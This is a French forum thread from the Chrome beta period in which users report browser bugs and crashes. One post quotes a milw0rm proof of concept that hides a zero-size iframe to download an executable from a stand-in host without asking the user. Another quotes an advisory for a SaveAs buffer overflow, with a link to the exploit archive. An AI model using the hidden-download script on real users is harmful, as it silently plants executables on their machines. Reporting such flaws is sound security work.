Liste des bugs, erreurs et failles Google Chrome beta

[Madrileño]

Ce problème est aussi sur FireFox et peut-être d'autres navigateurs, il suffit que le script soit un peu long au chargement (par exemple le serveur un peu lent).

[carole heinz]

encore une petite erreur, je ne sais pas si elle a déjà été soulignée ici:

La Belgique a été annexée à l'Allemagne

clin d'oeil à l'actualité de la Belgique? Vengeance suite à la condamnation de Google en Belgique? erreur?

[RiPSO]

quand ils auront envoyé leur satellite pour améliorer google earth ils auront peut être une carte à jour

[YO64]

Même FAI ?
Quel OS ?
Peu peut-être apporter des réponses.

Neufbox avec windows xp sp 3.

[carole heinz]

exploit milworm:

Code: Tout sélectionner

***************************************************************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]

http://www.milw0rm.com/exploits/6355

[mamy domdom]

bonjour
je l'ai installé hier,et rien de rien,si je fais une recherche,ça se bloque,et j'ai un message:
aïe,aïe,aïe,google chrome s'est bloqué,relancer ok,annuler,donc je le désinstalle pour le moment car pas le temps pour des tests
merci à vous si vous pensez que je l'ai mal installé
mamy domdom

[WebRankInfo]

en effet Carole, j'avais d'ailleurs signalé cette faille dans les commentaires sur http://www.webrankinfo.com/actualites/2 ... chrome.htm

[hipopulation]

Je ne sais pas si ça a déjà été vu mais taper :

Code: Tout sélectionner

about:%

dans la barre d'adresse.......

[Cendrillon]

Je ne sais pas si ça a déjà été vu mais taper :

Code: Tout sélectionner

about:%

dans la barre d'adresse.......

Pas vraiment sympa le résultat ...

[RiPSO]

Je ne sais pas si ça a déjà été vu mais taper :

Code: Tout sélectionner

about:%

dans la barre d'adresse.......

Pas vraiment sympa le résultat ...

Aïe aïe aïe!

[papyjo78]

pas moyen de faire un clic droit sans erreur serieuse de microsoft !

[Cendrillon]

Allons, allons ... ce n'est pas parce que c'est Microsoft (éditeur du système d'exploitation) qui remonte les erreurs et affiche les messages de plantage qu'il en est à l'origine et/ou responsable ...

[h4ni]

une autre faille signaler sur millw0rm

Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit

[carole heinz]

en effet:

Code: Tout sélectionner

PoC Code is in Attach file because this file is saved in 'Unicode' type for exploit.

Here is Description for this Vuln :
·          Type of Issue : Buffer Overflow.
·          Affected Software : Google Chrome 0.2.149.27.     
·          Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
·          Impact: Remote code execution.
·          Rating : Critical .
·          Description :
The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving
a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes
it possible for attackers to execute arbitrary code on users’ systems.
·          How an attacker could exploit the issue :
To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code.
He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would
be executed, giving him the privilege to make use of the affected system.
·          Discoverer : Le Duc Anh - SVRT - Bkis
·          About SVRT :
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes
in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols
and embedded systems…
·          Website : security.bkis.vn
·          Mail : svrt[at]bkav.com.vn

http://milw0rm.com/sploits/2008-chrome.tgz

# milw0rm.com [2008-09-05]


http://www.milw0rm.com/exploits/6367

[Scrat]

Moi je n'arrive pas à acceder à un site qui nécessite un certificat.

J'ai importer le certificat et celui-ci n'est pas reconnu alors que le même certificat ne pose aucun soucis sous FF et IE.
Pour infos, une personne sur un autre forum a exactement le même soucis